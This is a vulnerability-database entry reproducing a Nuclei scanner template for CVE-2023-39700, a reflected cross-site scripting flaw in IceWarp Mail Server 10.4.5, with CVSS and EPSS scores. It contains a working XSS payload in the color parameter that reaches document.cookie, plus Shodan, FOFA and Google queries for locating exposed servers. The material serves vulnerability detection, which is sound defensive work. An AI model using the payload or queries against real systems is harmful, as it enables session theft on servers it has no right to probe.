Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-39700
HistoryOct 17, 2023 - 7:20 a.m.

IceWarp Mail Server v10.4.5 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
10
cve
icewarp mail server
cross-site scripting
unauthenticated

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

42.4%

IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
id: CVE-2023-39700

info:
  name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39700
    - https://cwe.mitre.org/data/definitions/79.html
    - https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)
    - https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_%28XSS%29
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39700
    cwe-id: CWE-79
    epss-score: 0.00103
    epss-percentile: 0.42039
    cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query:
      - http.title:"IceWarp Server Administration"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - intitle:"icewarp server administration"
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
  tags: cve,cve2023,icewarp,xss,unauth

http:
  - raw:
      - |
        GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "><img src=x onerror=confirm(document.cookie)>") && contains(body, "IceWarp")'
        condition: and
# digest: 4b0a0048304602210080543a209ab39db177f7068a1e48f1b1f0439fb77f185bd17c00975df65c142d022100e6a96d41521239a3c7404f5f4a76a26be03aa8db4332889f9950f405beee3557:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

42.4%

Related for NUCLEI:CVE-2023-39700